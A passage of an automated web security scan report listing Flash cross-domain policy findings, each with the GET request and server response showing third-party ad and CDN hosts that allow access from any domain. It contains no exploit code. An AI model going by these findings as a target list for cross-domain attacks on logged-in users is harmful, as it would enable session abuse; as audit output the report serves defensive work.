The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://a.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.2. http://ad.afy11.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:07 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.3. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 04 Sep 2011 01:21:13 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.4. http://ad.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 01:05:49 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 01:05:49 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.5. http://admeld.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:01:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:01:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.6. http://admin.brightcove.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admin.brightcove.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Sun, 04 Sep 2011 01:06:33 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.7. http://ads.undertone.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 29 Aug 2011 20:44:50 GMT
ETag: "52206e9-fc-4abaaf7619480"
Content-Type: text/xml
Date: Sun, 04 Sep 2011 00:45:04 GMT
Content-Length: 252
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.8. http://altfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:45:21 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.9. http://api.affinesystems.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.affinesystems.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.affinesystems.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:21:56 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Fri, 17 Jun 2011 17:02:20 GMT
ETag: "b8e352-cc-4a5eb593e5f00"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.10. http://api.bit.ly/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bit.ly
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:45:49 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Wed, 25 May 2011 20:29:51 GMT
Connection: close
Expires: Tue, 06 Sep 2011 00:45:49 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.11. http://as.casalemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.casalemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 01:02:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:02:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.12. http://audit.303br.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://audit.303br.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: audit.303br.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Sun, 04 Sep 2011 00:45:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.13. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:42:17 GMT
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.14. http://bh.contextweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sun, 04 Sep 2011 01:21:59 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.15. http://c.brightcove.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Sun, 04 Sep 2011 01:06:09 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.16. http://c5.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c5.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c5.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:04:15 GMT
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
Date: Sun, 04 Sep 2011 01:22:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.17. http://c7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6536
Date: Sun, 04 Sep 2011 01:04:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.18. http://cdn.cinesport.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.cinesport.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.cinesport.com

Response

HTTP/1.0 200 OK
x-amz-id-2: aEaeSUpc60vkN5xGlJj7zIBJehC+5D6nUIMHOJ5M6rcQc8P9nk0vOx9i3FSBXAui
x-amz-request-id: 521035425F0CA074
Date: Tue, 22 Mar 2011 22:58:30 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Server: AmazonS3
Age: 4964
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 458df1119b180bde4aa261499705692ef0861449c6ed965fd28ed274ac9a0faf42b25cf1c8b5350f
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 4fbd9b3a8165adb6c7a206b9088f20b1.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.19. http://cdn.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:42:57 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.20. http://cdn.taboolasyndication.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.taboolasyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Feb 2011 17:27:56 GMT
ETag: "a88001-199-49b64160f9f00"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
Cache-Control: private, max-age=31536000
Age: 17664036
Expires: Sat, 11 Feb 2012 14:05:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.21. http://cdn.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 04 Sep 2011 01:06:31 GMT
Date: Sun, 04 Sep 2011 01:06:31 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.22. http://cdn.visiblemeasures.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.visiblemeasures.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "49e4e5b932ff87fda571934152e3458c:1267584532"
Last-Modified: Wed, 03 Mar 2010 02:48:52 GMT
Accept-Ranges: bytes
Content-Length: 141
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:10:41 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.23. https://cdns.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://cdns.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdns.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web102
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 01:22:14 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.24. http://clk.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.25. http://companion.adap.tv/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://companion.adap.tv
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: companion.adap.tv

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/xml
Connection: close
Content-Length: 194

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.26. http://control.adap.tv/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://control.adap.tv
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/xml
Connection: Keep-Alive
Content-Length: 194

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.27. http://d3fd89.r.axf8.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d3fd89.r.axf8.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d3fd89.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:58:59 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.28. http://external.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:13:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.29. http://findnsave.sacbee.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://findnsave.sacbee.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: findnsave.sacbee.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 15 Dec 2009 23:03:45 GMT
Accept-Ranges: bytes
ETag: "ed84bfdada7dca1:0"
Server: Microsoft-IIS/7.5
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Powered-By: ASP.NET
X-Server-Name: FS1
Date: Sun, 04 Sep 2011 01:22:28 GMT
Connection: close
Content-Length: 221

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<
...[SNIP]...

6.30. http://gannett.gcion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.31. http://goku.brightcove.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://goku.brightcove.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: goku.brightcove.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:12:45 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 116
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.32. http://gscounters.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gscounters.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2dc1"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web201
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:44:37 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.33. http://i.w55c.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:47 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 488
content-type: application/xml
Via: 1.1 bfi061002 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" to-ports="*"/>
<site-control
...[SNIP]...

6.34. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.35. http://imp.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
